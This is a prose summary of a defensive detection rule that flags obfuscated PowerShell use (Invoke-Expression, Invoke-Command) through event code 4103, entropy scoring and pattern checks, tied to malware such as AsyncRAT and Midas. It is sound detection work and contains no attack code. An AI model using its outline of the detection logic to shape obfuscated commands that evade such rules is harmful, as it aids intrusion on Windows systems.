
Summary
This detection rule aims to identify the use of obfuscated PowerShell commands, which attackers often use to conceal malicious operations. By monitoring for event code 4103, this rule captures specific PowerShell activities such as Invoke-Expression and Invoke-Command. It employs regular expressions to extract and analyze the obfuscated commands from the logs, as well as the associated script names. Key checks include filtering out common file extensions like .ps1 to avoid false positives while focusing on command length and specific patterns indicative of obfuscation techniques. The detection rule supplements its findings with Shannon entropy to evaluate the complexity of the obfuscation, factoring in multiple patterns that could signal an obfuscation attempt. There is a reliance on URL Toolbox for enhanced functionality, especially regarding the identification of obfuscated commands, making it necessary for the detection to analyze both PowerShell logs and Windows event logs effectively. Overall, this rule assists in uncovering methods employed by malware such as AsyncRAT and Midas that leverage basic obfuscation strategies to evade detection and maintain command-and-control capabilities.
Categories
- Windows
- Endpoint
Data Sources
- Process
- Application Log
- Windows Registry
ATT&CK Techniques
- T1027
- T1001
Created: 2024-02-09